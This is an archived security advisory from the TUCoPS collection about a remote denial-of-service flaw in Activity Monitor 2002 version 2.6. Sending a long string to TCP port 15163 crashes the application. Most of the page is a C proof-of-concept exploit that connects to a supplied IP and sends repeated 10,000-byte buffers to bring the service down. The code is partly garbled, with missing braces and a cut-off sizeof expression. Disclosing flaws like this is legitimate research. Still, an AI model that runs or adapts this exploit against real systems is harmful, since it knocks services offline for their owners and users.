Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Security App Flaws :: bt316.txt

Activity Monitor 2002 remote Denial of Service

Overview: "Activity Monitor 2002 is a monitoring software system for real 

time employee

          monitoring and continuous tracking of users activities on 

networked computers."

	  More information can be found at

Vulnerability Description: By connecting TCP port 15163 and sending a long 

string, a remote

			   attacker could cause the application to crash 

and exhaust CPU


Affected Software: Activity Monitor 2002 ver. 2.6


#include <stdio.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <string.h>

int main(int argc, char **argv)


  int i,ck,port,sd;

  char dos[10000];

  struct sockaddr_in act_mon_server;

  if(argc < 2)


    printf("\nUsage: %s <ip>\n", argv[0]);




  port = 15163;


  for(i = 0; i < 10000; i++) dos[i] = 'x';


  act_mon_server.sin_family = AF_INET;

  act_mon_server.sin_port = htons((u_short)port);

  act_mon_server.sin_addr.s_addr = (long)inet_addr(argv[1]);


  sd = socket(AF_INET, SOCK_STREAM, 0);


  ck = connect(sd, (struct sockaddr *) &act_mon_server, sizeof



  if(ck != 0) { 





  printf("\n\t\tProof of Concept Activity Monitor 2002 DoS\n");

  printf("\t\tby Luca Ercoli\n\n");

  write(sd, dos, sizeof(dos)); 

  write(sd, dos, sizeof(dos));

  write(sd, dos, sizeof(dos));


  printf("\nDoS sent!\n");





TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH